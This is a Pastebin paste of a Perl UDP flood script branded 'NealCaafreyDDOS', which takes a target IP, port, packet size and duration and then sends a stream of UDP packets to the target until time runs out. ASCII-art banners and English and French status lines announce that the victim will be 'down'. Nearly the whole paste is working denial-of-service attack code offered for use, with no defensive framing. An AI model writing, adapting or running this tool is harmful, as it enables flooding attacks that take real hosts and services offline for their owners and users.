Advertisement
Guest User

Untitled

a guest
Aug 27th, 2016
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.23 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. ##
  4. # WM|T Team
  5. ##
  6.  
  7. use Socket;
  8. use strict;
  9.  
  10. my ($ip,$port,$size,$time) = @ARGV;
  11.  
  12. my ($iaddr,$endtime,$psize,$pport);
  13.  
  14. $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
  15. $endtime = time() + ($time ? $time : 100);
  16. socket(flood, PF_INET, SOCK_DGRAM, 17);
  17. use Term::ANSIColor;
  18. print color 'green';
  19. print <<EOTEXT;
  20.  
  21. ____________________________________________________
  22. / \
  23. | _____________________________________________ |
  24. | | | |
  25. | | C:\NealCaafreyDDOS> _ | |
  26. | | | |
  27. | | | |
  28. | | | |
  29. | | | |
  30. | | | |
  31. | | | |
  32. | | | |
  33. | | | |
  34. | | | |
  35. | | | |
  36. | | | |
  37. | |_____________________________________________| |
  38. | |
  39. \_____________________________________________________/
  40. \_______________________________________/
  41. _______________________________________________
  42. _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
  43. _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
  44. _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
  45. _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
  46. _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
  47. :-----------------------------------------------------------------------------:
  48. `---._.-----------------------------------------------------------------._.---'
  49.  
  50. ooooooooo
  51. 888 88o ooooooo oooo o oooo oo oooooo
  52. 888 888 888 888 888 888 888 888 888
  53. 888 888 888 888 888888888 888 888
  54. o888ooo88 88ooo88 88 88 o888o o888o
  55.  
  56. Script By Nealcaafrey
  57.  
  58. ~Your Target: $ip Down In a few Second !
  59. ~The Victim Down for $time Second !
  60. ~You using this port ($port)
  61. ~The size is ($size)
  62.  
  63. EOTEXT
  64. use Term::ANSIColor;
  65. print color 'cyan';
  66. print "IP CIBLE: $ip " . "SUR LE PORT: " . ($port ? $port : "random") . "
  67. PUISSANCE D'ATTAQUE: " .
  68. ($size ? "$size BYTE(S)" : "PUISSANCE MAX DU VPS !") . "
  69. " .
  70. ($time ? " POUR $time SECONDE(S)" : "") . "\n";
  71. print "STOPPER L'ATTAQUE: CTRL + C" unless $time;
  72.  
  73. for (;time() <= $endtime;) {
  74. $psize = $size ? $size : int(rand(1500000-64)+64) ;
  75. $pport = $port ? $port : int(rand(1500000))+1;
  76.  
  77. send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
  78. $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement